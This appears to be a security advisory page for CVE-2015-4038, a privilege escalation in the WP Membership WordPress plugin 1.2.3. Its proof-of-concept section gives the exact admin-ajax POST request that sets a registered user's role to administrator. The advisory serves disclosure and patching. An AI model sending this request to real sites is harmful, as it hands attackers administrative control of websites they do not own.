Lucene search
SecurityvulnsSECURITYVULNS:DOC:32170HistoryJun 08, 2015 - 12:00 a.m.
CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]
2015-06-0800:00:00
vulners.com
19
Exploit Title: CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]
Contact: https://twitter.com/panVagenas
Vendor Homepage: http://wpmembership.e-plugins.com/
Software Link: http://codecanyon.net/item/wp-membership/10066554
Version: 1.2.3
Tested on: WordPress 4.2.2
CVE: CVE-2015-4038
1 Description
Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action.
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.
2 Proof of Concept
- Login as regular user
- Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`
3 Actions taken after discovery
Vendor was informed on 2015/05/19.
Related
zdt
zdt
WordPress WP Membership Plugin 1.2.3 Privilege Escalation Vulnerability
2015-05-23 00:00:00
patchstack
patchstack
WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities
2015-05-21 00:00:00
cve
cve
CVE-2015-4038
2015-06-03 20:59:00
CVE-2015-4039
2020-01-06 19:15:00
packetstorm
packetstorm
WordPress WP Membership 1.2.3 Privilege Escalation
2015-05-22 00:00:00
prion
prion
Code injection
2015-06-03 20:59:00
Cross site scripting
2020-01-06 19:15:00
wpvulndb
wpvulndb
WP Membership <= 1.2.3 - Multiple Vulnerabilities
2015-05-21 00:00:00
securityvulns
securityvulns
Related for SECURITYVULNS:DOC:32170